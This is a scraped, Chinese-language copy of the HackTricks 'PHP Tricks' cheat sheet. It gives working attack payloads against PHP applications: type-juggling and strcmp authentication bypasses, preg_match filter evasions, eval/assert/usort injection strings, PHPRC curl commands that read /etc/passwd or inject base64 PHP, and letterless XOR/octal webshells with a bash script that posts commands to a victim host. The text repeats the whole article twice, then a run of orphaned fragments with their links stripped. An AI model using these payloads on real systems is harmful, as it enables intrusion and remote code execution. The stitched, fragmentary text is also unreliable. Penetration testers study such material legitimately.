PHP Tricks

从零开始学习 AWS 黑客技术，成为专家 ！

支持 HackTricks 的其他方式：

如果您想看到您的公司在 HackTricks 中做广告或下载 PDF 版本的 HackTricks，请查看!
获取
探索，我们的独家
加入 💬 或或关注我们的 Twitter 🐦 。
通过向和 github 仓库提交 PR 来分享您的黑客技巧。

Cookies 常见位置：

这也适用于 phpMyAdmin 的 cookies。

Cookies:

PHPSESSID
phpMyAdmin

位置：

/var/lib/php/sessions
/var/lib/php5/
/tmp/
Example: ../../../../../../tmp/sess_d1d531db62523df80e1153ada1d4b02e

绕过 PHP 比较

弱比较/类型转换（==）

如果在 PHP 中使用 ==，则存在意外情况，比较的行为与预期不同。这是因为 "==" 只比较转换为相同类型的值，如果您还想比较所比较数据的类型是否相同，您需要使用 ===。

"string" == 0 -> True 以非数字开头的字符串等于数字
"0xAAAA" == "43690" -> True 由十进制或十六进制格式的数字组成的字符串可以与其他数字/字符串进行比较，如果数字相同，则结果为 True（字符串中的数字被解释为数字）
"0e3264578" == 0 --> True 以 "0e" 开头并跟随任何内容的字符串将等于 0
"0X3264578" == 0X --> True 以 "0" 开头并跟随任何字母（X 可以是任何字母）和任何内容的字符串将等于 0
"X" == 0 --> True 字符串中的任何字母等于整数 0

in_array()

类型转换 也会影响到 in_array() 函数，默认情况下（需要将第三个参数设置为 true 才能进行严格比较）：

$values = array("apple","orange","pear","grape");
var_dump(in_array(0, $values));
//True
var_dump(in_array(0, $values, true));
//False

strcmp()/strcasecmp()

如果此函数用于任何身份验证检查（比如检查密码），并且用户控制比较的一侧，他可以发送一个空数组而不是一个字符串作为密码的值（https://example.com/login.php/?username=admin&password[]=），从而绕过此检查：

if (!strcmp("real_pwd","real_pwd")) { echo "Real Password"; } else { echo "No Real Password"; }
// Real Password
if (!strcmp(array(),"real_pwd")) { echo "Real Password"; } else { echo "No Real Password"; }
// Real Password

严格类型转换

即使使用 ===，仍可能出现错误，使比较容易受到类型转换的影响。例如，如果比较在比较之前将数据转换为不同类型的对象：

(int) "1abc" === (int) "1xyz" //This will be true

preg_match(/^.*/)

preg_match() 可用于验证用户输入（它检查用户输入中是否存在黑名单中的任何单词/正则表达式，如果没有，则代码可以继续执行）。

换行符绕过

然而，当限定正则表达式的开头时，preg_match() 只检查用户输入的第一行，如果你可以以多行的方式发送输入，你就可以绕过这个检查。例如：

$myinput="aaaaaaa
11111111"; //Notice the new line
echo preg_match("/1/",$myinput);
//1  --> In this scenario preg_match find the char "1"
echo preg_match("/1.*$/",$myinput);
//1  --> In this scenario preg_match find the char "1"
echo preg_match("/^.*1/",$myinput);
//0  --> In this scenario preg_match DOESN'T find the char "1"
echo preg_match("/^.*1.*$/",$myinput);
//0  --> In this scenario preg_match DOESN'T find the char "1"

要绕过此检查，您可以使用新行进行url编码（%0A）发送该值，或者如果可以发送JSON数据，请将其分成多行发送：

{
"cmd": "cat /etc/passwd"
}

长度错误绕过

（这个绕过似乎是在 PHP 5.2.5 上尝试的，我无法在 PHP 7.3.15 上使其工作）如果你可以向 preg_match() 发送一个非常大的有效输入，它无法处理它，你就可以绕过检查。例如，如果它在黑名单中列出了一个 JSON，你可以发送：

payload = '{"cmd": "ls -la", "injected": "'+ "a"*1000001 + '"}'

ReDoS绕过

payload = f"@dimariasimone on{'X'*500_001} {{system('id')}}"

用于 PHP 混淆的类型转换

$obfs = "1"; //string "1"
$obfs++; //int 2
$obfs += 0.2; //float 2.2
$obfs = 1 + "7 IGNORE"; //int 8
$obfs = "string" + array("1.1 striiing")[0]; //float 1.1
$obfs = 3+2 * (TRUE + TRUE); //int 7
$obfs .= ""; //string "7"
$obfs += ""; //int 7

在重定向后执行（EAR）

如果 PHP 正在重定向到另一个页面，但在设置了 Location 头之后没有调用 die 或 exit 函数，PHP 将继续执行并将数据附加到主体中：

<?php
// In this page the page will be read and the content appended to the body of
// the redirect response
$page = $_GET['page'];
header('Location: /index.php?page=default.html');
readfile($page);
?>

路径遍历和文件包含利用

检查:

代码执行

system("ls"); `ls`; shell_exec("ls");

通过 preg_replace() 实现 RCE

preg_replace(pattern,replace,base)
preg_replace("/a/e","phpinfo()","whatever")

要执行“replace”参数中的代码，至少需要一个匹配项。这个preg_replace选项在PHP 5.5.0版本之后已经被弃用。

通过Eval()实现RCE

'.system('uname -a'); $dummy='
'.system('uname -a');#
'.system('uname -a');//
'.phpinfo().'
<?php phpinfo(); ?>

通过 Assert() 实现 RCE

这个 php 中的函数允许你执行以字符串形式编写的代码，以便返回 true 或 false（并根据此修改执行）。通常用户变量会被插入到字符串的中间。例如： assert("strpos($_GET['page']),'..') === false") --> 在这种情况下，要获得RCE，你可以这样做：

?page=a','NeVeR') === false and system('ls') and strpos('a

通过 usort() 实现远程代码执行（RCE）

该函数用于使用特定函数对项目数组进行排序。要滥用此函数：

<?php usort(VALUE, "cmp"); #Being cmp a valid function ?>
VALUE: );phpinfo();#

<?php usort();phpinfo();#, "cmp"); #Being cmp a valid function ?>

<?php
function foo($x,$y){
usort(VALUE, "cmp");
}?>
VALUE: );}[PHP CODE];#

<?php
function foo($x,$y){
usort();}phpinfo;#, "cmp");
}?>

使用 // 进行代码注释。

要发现需要关闭的括号数量：

?order=id;}//：我们收到一个错误消息（Parse error: syntax error, unexpected ';'）。我们可能缺少一个或多个括号。
?order=id);}//：我们收到一个警告。看起来差不多。
?order=id));}//：我们收到一个错误消息（Parse error: syntax error, unexpected ')' i）。我们可能有太多的闭合括号。

通过 .httaccess 实现 RCE

如果你可以上传一个 .htaccess 文件，那么你可以配置几个东西，甚至执行代码（配置扩展名为 .htaccess 的文件可以执行）。

通过环境变量实现 RCE

如果你发现一个允许你 修改 PHP 环境变量 的漏洞（以及另一个允许上传文件的漏洞，尽管通过更多研究可能可以绕过此问题），你可以滥用这种行为来实现 RCE。

PHPRC：指示 PHP 查找其配置文件 的位置，通常称为 php.ini。如果你可以上传自己的配置文件，那么使用 PHPRC 来指向 PHP。添加一个 auto_prepend_file 条目，指定第二个上传的文件。这第二个文件包含正常的 PHP 代码，然后由 PHP 运行时执行，在执行任何其他代码之前。

上传一个包含我们的 shellcode 的 PHP 文件
上传第二个文件，其中包含一个 auto_prepend_file 指令，指示 PHP 预处理器执行我们在步骤 1 中上传的文件
将 PHPRC 变量设置为我们在步骤 2 中上传的文件。

PHPRC - 另一个选项
如果你 无法上传文件，你可以在 FreeBSD 中使用包含 stdin 的 "file" /dev/fd/0，作为发送到 stdin 的请求的主体：
curl "http://10.12.72.1/?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"'
或者要获得 RCE，启用 allow_url_include 并在一个文件前添加 base64 PHP 代码：
curl "http://10.12.72.1/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'

PHP 静态分析

exec, shell_exec, system, passthru, eval, popen
unserialize, include, file_put_cotents
$_COOKIE | if #This mea

如果您正在调试PHP应用程序，可以在/etc/php5/apache2/php.ini中添加display_errors = On来全局启用错误打印，并重新启动apache：sudo systemctl restart apache2

解密PHP代码

PHP包装器和协议

Xdebug未经身份验证的RCE

变量变量

$x = 'Da';
$$x = 'Drums';

echo $x; //Da
echo $$x; //Drums
echo $Da; //Drums
echo "${Da}"; //Drums
echo "$x ${$x}"; //Da Drums
echo "$x ${Da}"; //Da Drums

利用新的 $_GET["a"]($_GET["b"])

如果在一个页面中可以创建任意类的新对象，则可能能够获得RCE，请查看以下页面以了解详情：

在不使用字母的情况下执行PHP

使用八进制

$_="\163\171\163\164\145\155(\143\141\164\40\56\160\141\163\163\167\144)"; #system(cat .passwd);

异或

$_=("%28"^"[").("%33"^"[").("%34"^"[").("%2c"^"[").("%04"^"[").("%28"^"[").("%34"^"[").("%2e"^"[").("%29"^"[").("%38"^"[").("%3e"^"["); #show_source
$__=("%0f"^"!").("%2f"^"_").("%3e"^"_").("%2c"^"_").("%2c"^"_").("%28"^"_").("%3b"^"_"); #.passwd
$___=$__; #Could be not needed inside eval
$_($___); #If ¢___ not needed then $_($__), show_source(.passwd)

XOR 简易 shell 代码

$_="`{{{"^"?<>/"; // $_ = '_GET';
${$_}[_](${$_}[__]); // $_GET[_]($_GET[__]);

$_="`{{{"^"?<>/";${$_}[_](${$_}[__]); // $_ = '_GET'; $_GET[_]($_GET[__]);

所以，如果您可以执行任意PHP代码而不使用数字和字母，您可以发送类似以下滥用该有效负载以执行任意PHP代码的请求：

POST: /action.php?_=system&__=cat+flag.php
Content-Type: application/x-www-form-urlencoded

comando=$_="`{{{"^"?<>/";${$_}[_](${$_}[__]);

异或 Shellcode（在 eval 中）

#!/bin/bash

if [[ -z $1 ]]; then
echo "USAGE: $0 CMD"
exit
fi

CMD=$1
CODE="\$_='\

lt;>/'^'{{{{';\${\$_}[_](\${\$_}[__]);" `$_='

lt;>/'^'{{{{'; --> _GET` `${$_}[_](${$_}[__]); --> $_GET[_]($_GET[__])` `So, the function is inside $_GET[_] and the parameter is inside $_GET[__]` http --form POST "http://victim.com/index.php?_=system&__=$CMD" "input=$CODE"

Perl 类似

<?php
$_=[];
$_=@"$_"; // $_='Array';
$_=$_['!'=='@']; // $_=$_[0];
$___=$_; // A
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__; // S
$___.=$__; // S
$__=$_;
$__++;$__++;$__++;$__++; // E
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__;

$____='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$____.=$__;

$_=$$____;
$___($_[_]); // ASSERT($_POST[_]);

上一页Nginx 下一页PHP - Useful Functions & disable_functions/open_basedir bypass

最后更新于1年前

从零开始学习 AWS 黑客技术，成为专家 ！

支持 HackTricks 的其他方式：

如果您想看到您的公司在 HackTricks 中做广告或下载 PDF 版本的 HackTricks，请查看!
获取
探索，我们的独家
加入 💬 或或关注我们的 Twitter 🐦 。
通过向和 github 仓库提交 PR 来分享您的黑客技巧。

Websec | Uw Cybersecurity Specialist

Cookies 常见位置：

这也适用于 phpMyAdmin 的 cookies。

Cookies:

PHPSESSID
phpMyAdmin

位置：

/var/lib/php/sessions
/var/lib/php5/
/tmp/
Example: ../../../../../../tmp/sess_d1d531db62523df80e1153ada1d4b02e

绕过 PHP 比较

弱比较/类型转换（==）

如果在 PHP 中使用 ==，则存在意外情况，比较的行为与预期不同。这是因为 "==" 只比较转换为相同类型的值，如果您还想比较所比较数据的类型是否相同，您需要使用 ===。

PHP 比较表格：

590KB

EN-PHP-loose-comparison-Type-Juggling-OWASP (1).pdf

pdf

"string" == 0 -> True 以非数字开头的字符串等于数字
"0xAAAA" == "43690" -> True 由十进制或十六进制格式的数字组成的字符串可以与其他数字/字符串进行比较，如果数字相同，则结果为 True（字符串中的数字被解释为数字）
"0e3264578" == 0 --> True 以 "0e" 开头并跟随任何内容的字符串将等于 0
"0X3264578" == 0X --> True 以 "0" 开头并跟随任何字母（X 可以是任何字母）和任何内容的字符串将等于 0
"0e12334" == "0" --> True 这非常有趣，因为在某些情况下，您可以控制以 "0" 开头的字符串输入以及正在被散列并与之比较的某些内容。因此，如果您可以提供一个将创建以 "0e" 开头且没有任何字母的哈希的值，您可以绕过比较。您可以在此处找到具有此格式的已散列字符串：
"X" == 0 --> True 字符串中的任何字母等于整数 0

更多信息请参阅

in_array()

类型转换 也会影响到 in_array() 函数，默认情况下（需要将第三个参数设置为 true 才能进行严格比较）：

$values = array("apple","orange","pear","grape");
var_dump(in_array(0, $values));
//True
var_dump(in_array(0, $values, true));
//False

strcmp()/strcasecmp()

如果此函数用于任何身份验证检查（比如检查密码），并且用户控制比较的一侧，他可以发送一个空数组而不是一个字符串作为密码的值（https://example.com/login.php/?username=admin&password[]=），从而绕过此检查：

if (!strcmp("real_pwd","real_pwd")) { echo "Real Password"; } else { echo "No Real Password"; }
// Real Password
if (!strcmp(array(),"real_pwd")) { echo "Real Password"; } else { echo "No Real Password"; }
// Real Password

严格类型转换

即使使用 ===，仍可能出现错误，使比较容易受到类型转换的影响。例如，如果比较在比较之前将数据转换为不同类型的对象：

(int) "1abc" === (int) "1xyz" //This will be true

preg_match(/^.*/)

preg_match() 可用于验证用户输入（它检查用户输入中是否存在黑名单中的任何单词/正则表达式，如果没有，则代码可以继续执行）。

换行符绕过

然而，当限定正则表达式的开头时，preg_match() 只检查用户输入的第一行，如果你可以以多行的方式发送输入，你就可以绕过这个检查。例如：

$myinput="aaaaaaa
11111111"; //Notice the new line
echo preg_match("/1/",$myinput);
//1  --> In this scenario preg_match find the char "1"
echo preg_match("/1.*$/",$myinput);
//1  --> In this scenario preg_match find the char "1"
echo preg_match("/^.*1/",$myinput);
//0  --> In this scenario preg_match DOESN'T find the char "1"
echo preg_match("/^.*1.*$/",$myinput);
//0  --> In this scenario preg_match DOESN'T find the char "1"

要绕过此检查，您可以使用新行进行url编码（%0A）发送该值，或者如果可以发送JSON数据，请将其分成多行发送：

{
"cmd": "cat /etc/passwd"
}

找到一个示例：

长度错误绕过

（这个绕过似乎是在 PHP 5.2.5 上尝试的，我无法在 PHP 7.3.15 上使其工作）如果你可以向 preg_match() 发送一个非常大的有效输入，它无法处理它，你就可以绕过检查。例如，如果它在黑名单中列出了一个 JSON，你可以发送：

payload = '{"cmd": "ls -la", "injected": "'+ "a"*1000001 + '"}'

ReDoS绕过

技巧来源：和

简而言之，问题发生在PHP中的preg_*函数上，它建立在之上。在PCRE中，某些正则表达式是通过大量递归调用来匹配的，这会使用大量堆栈空间。可以设置允许的递归次数上限，但在PHP中，此限制，这超出了堆栈的容量。

也在帖子中链接，其中更深入地讨论了这个问题。我们的任务现在很明确： 发送一个输入，使正则表达式执行100,000次以上的递归，导致SIGSEGV，使preg_match()函数返回false，从而使应用程序认为我们的输入不是恶意的，最后在有效载荷的结尾处添加类似{system(<verybadcommand>)} 的内容，以获取SSTI --> RCE --> flag :)。

在正则表达式术语中，我们实际上并没有执行10万次“递归”，而是在计算“回溯步骤”，正如所述，默认情况下，在pcre.backtrack_limit变量中默认为1,000,000（1M）。要达到这个目标，'X'*500_001将导致100万个回溯步骤（50万个向前和50万个向后）。

payload = f"@dimariasimone on{'X'*500_001} {{system('id')}}"

用于 PHP 混淆的类型转换

$obfs = "1"; //string "1"
$obfs++; //int 2
$obfs += 0.2; //float 2.2
$obfs = 1 + "7 IGNORE"; //int 8
$obfs = "string" + array("1.1 striiing")[0]; //float 1.1
$obfs = 3+2 * (TRUE + TRUE); //int 7
$obfs .= ""; //string "7"
$obfs += ""; //int 7

在重定向后执行（EAR）

如果 PHP 正在重定向到另一个页面，但在设置了 Location 头之后没有调用 die 或 exit 函数，PHP 将继续执行并将数据附加到主体中：

<?php
// In this page the page will be read and the content appended to the body of
// the redirect response
$page = $_GET['page'];
header('Location: /index.php?page=default.html');
readfile($page);
?>

路径遍历和文件包含利用

检查:

File Inclusion/Path traversal

代码执行

system("ls"); `ls`; shell_exec("ls");

通过 preg_replace() 实现 RCE

preg_replace(pattern,replace,base)
preg_replace("/a/e","phpinfo()","whatever")

要执行“replace”参数中的代码，至少需要一个匹配项。这个preg_replace选项在PHP 5.5.0版本之后已经被弃用。

通过Eval()实现RCE

'.system('uname -a'); $dummy='
'.system('uname -a');#
'.system('uname -a');//
'.phpinfo().'
<?php phpinfo(); ?>

通过 Assert() 实现 RCE

这个 php 中的函数允许你执行以字符串形式编写的代码，以便返回 true 或 false（并根据此修改执行）。通常用户变量会被插入到字符串的中间。例如： assert("strpos($_GET['page']),'..') === false") --> 在这种情况下，要获得RCE，你可以这样做：

?page=a','NeVeR') === false and system('ls') and strpos('a

通过 usort() 实现远程代码执行（RCE）

该函数用于使用特定函数对项目数组进行排序。要滥用此函数：

<?php usort(VALUE, "cmp"); #Being cmp a valid function ?>
VALUE: );phpinfo();#

<?php usort();phpinfo();#, "cmp"); #Being cmp a valid function ?>

<?php
function foo($x,$y){
usort(VALUE, "cmp");
}?>
VALUE: );}[PHP CODE];#

<?php
function foo($x,$y){
usort();}phpinfo;#, "cmp");
}?>

使用 // 进行代码注释。

要发现需要关闭的括号数量：

?order=id;}//：我们收到一个错误消息（Parse error: syntax error, unexpected ';'）。我们可能缺少一个或多个括号。
?order=id);}//：我们收到一个警告。看起来差不多。
?order=id));}//：我们收到一个错误消息（Parse error: syntax error, unexpected ')' i）。我们可能有太多的闭合括号。

通过 .httaccess 实现 RCE

如果你可以上传一个 .htaccess 文件，那么你可以配置几个东西，甚至执行代码（配置扩展名为 .htaccess 的文件可以执行）。

可以在找到不同的 .htaccess shells。

通过环境变量实现 RCE

如果你发现一个允许你 修改 PHP 环境变量 的漏洞（以及另一个允许上传文件的漏洞，尽管通过更多研究可能可以绕过此问题），你可以滥用这种行为来实现 RCE。

：这个环境变量允许你在执行其他二进制文件时加载任意库（尽管在这种情况下可能不起作用）。
PHPRC：指示 PHP 查找其配置文件 的位置，通常称为 php.ini。如果你可以上传自己的配置文件，那么使用 PHPRC 来指向 PHP。添加一个 auto_prepend_file 条目，指定第二个上传的文件。这第二个文件包含正常的 PHP 代码，然后由 PHP 运行时执行，在执行任何其他代码之前。

上传一个包含我们的 shellcode 的 PHP 文件
上传第二个文件，其中包含一个 auto_prepend_file 指令，指示 PHP 预处理器执行我们在步骤 1 中上传的文件
将 PHPRC 变量设置为我们在步骤 2 中上传的文件。

获取有关如何执行此链的更多信息。
PHPRC - 另一个选项
如果你 无法上传文件，你可以在 FreeBSD 中使用包含 stdin 的 "file" /dev/fd/0，作为发送到 stdin 的请求的主体：
curl "http://10.12.72.1/?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"'
或者要获得 RCE，启用 allow_url_include 并在一个文件前添加 base64 PHP 代码：
curl "http://10.12.72.1/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'
技术。

PHP 静态分析

查看是否可以在对这些函数的调用中插入代码（来自）:

exec, shell_exec, system, passthru, eval, popen
unserialize, include, file_put_cotents
$_COOKIE | if #This mea

如果您正在调试PHP应用程序，可以在/etc/php5/apache2/php.ini中添加display_errors = On来全局启用错误打印，并重新启动apache：sudo systemctl restart apache2

解密PHP代码

您可以使用web 来解密php代码。

PHP包装器和协议

PHP包装器和协议可以让您在系统中绕过写入和读取保护，从而对其进行破坏。有关。

Xdebug未经身份验证的RCE

如果您发现phpconfig()输出中启用了Xdebug，则应尝试通过获取RCE

变量变量

$x = 'Da';
$$x = 'Drums';

echo $x; //Da
echo $$x; //Drums
echo $Da; //Drums
echo "${Da}"; //Drums
echo "$x ${$x}"; //Da Drums
echo "$x ${Da}"; //Da Drums

利用新的 $_GET["a"]($_GET["b"])

如果在一个页面中可以创建任意类的新对象，则可能能够获得RCE，请查看以下页面以了解详情：

PHP - RCE abusing object creation: new $_GET["a"]($_GET["b"])

在不使用字母的情况下执行PHP

使用八进制

$_="\163\171\163\164\145\155(\143\141\164\40\56\160\141\163\163\167\144)"; #system(cat .passwd);

异或

$_=("%28"^"[").("%33"^"[").("%34"^"[").("%2c"^"[").("%04"^"[").("%28"^"[").("%34"^"[").("%2e"^"[").("%29"^"[").("%38"^"[").("%3e"^"["); #show_source
$__=("%0f"^"!").("%2f"^"_").("%3e"^"_").("%2c"^"_").("%2c"^"_").("%28"^"_").("%3b"^"_"); #.passwd
$___=$__; #Could be not needed inside eval
$_($___); #If ¢___ not needed then $_($__), show_source(.passwd)

XOR 简易 shell 代码

根据，可以通过以下方式生成一个简单的 shellcode：

$_="`{{{"^"?<>/"; // $_ = '_GET';
${$_}[_](${$_}[__]); // $_GET[_]($_GET[__]);

$_="`{{{"^"?<>/";${$_}[_](${$_}[__]); // $_ = '_GET'; $_GET[_]($_GET[__]);

所以，如果您可以执行任意PHP代码而不使用数字和字母，您可以发送类似以下滥用该有效负载以执行任意PHP代码的请求：

POST: /action.php?_=system&__=cat+flag.php
Content-Type: application/x-www-form-urlencoded

comando=$_="`{{{"^"?<>/";${$_}[_](${$_}[__]);

要获取更详细的解释，请查看

异或 Shellcode（在 eval 中）

#!/bin/bash

if [[ -z $1 ]]; then
echo "USAGE: $0 CMD"
exit
fi

CMD=$1
CODE="\$_='\

lt;>/'^'{{{{';\${\$_}[_](\${\$_}[__]);" `$_='

lt;>/'^'{{{{'; --> _GET` `${$_}[_](${$_}[__]); --> $_GET[_]($_GET[__])` `So, the function is inside $_GET[_] and the parameter is inside $_GET[__]` http --form POST "http://victim.com/index.php?_=system&__=$CMD" "input=$CODE"

Perl 类似

<?php
$_=[];
$_=@"$_"; // $_='Array';
$_=$_['!'=='@']; // $_=$_[0];
$___=$_; // A
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__; // S
$___.=$__; // S
$__=$_;
$__++;$__++;$__++;$__++; // E
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__;

$____='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$____.=$__;

$_=$$____;
$___($_[_]); // ASSERT($_POST[_]);

Websec | Uw Cybersecurity Specialist

从零开始学习AWS黑客技术，成为专家 ！

支持HackTricks的其他方式：

PHP 比较表格：

"0e12334" == "0" --> True 这非常有趣，因为在某些情况下，您可以控制以 "0" 开头的字符串输入以及正在被散列并与之比较的某些内容。因此，如果您可以提供一个将创建以 "0e" 开头且没有任何字母的哈希的值，您可以绕过比较。您可以在此处找到具有此格式的已散列字符串：

更多信息请参阅

找到一个示例：

技巧来源：和

简而言之，问题发生在PHP中的preg_*函数上，它建立在之上。在PCRE中，某些正则表达式是通过大量递归调用来匹配的，这会使用大量堆栈空间。可以设置允许的递归次数上限，但在PHP中，此限制，这超出了堆栈的容量。

也在帖子中链接，其中更深入地讨论了这个问题。我们的任务现在很明确： 发送一个输入，使正则表达式执行100,000次以上的递归，导致SIGSEGV，使preg_match()函数返回false，从而使应用程序认为我们的输入不是恶意的，最后在有效载荷的结尾处添加类似{system(<verybadcommand>)} 的内容，以获取SSTI --> RCE --> flag :)。

在正则表达式术语中，我们实际上并没有执行10万次“递归”，而是在计算“回溯步骤”，正如所述，默认情况下，在pcre.backtrack_limit变量中默认为1,000,000（1M）。要达到这个目标，'X'*500_001将导致100万个回溯步骤（50万个向前和50万个向后）。

可以在找到不同的 .htaccess shells。

：这个环境变量允许你在执行其他二进制文件时加载任意库（尽管在这种情况下可能不起作用）。

获取有关如何执行此链的更多信息。

技术。

查看是否可以在对这些函数的调用中插入代码（来自）:

您可以使用web 来解密php代码。

PHP包装器和协议可以让您在系统中绕过写入和读取保护，从而对其进行破坏。有关。

如果您发现phpconfig()输出中启用了Xdebug，则应尝试通过获取RCE

根据，可以通过以下方式生成一个简单的 shellcode：

要获取更详细的解释，请查看

从零开始学习AWS黑客技术，成为专家 ！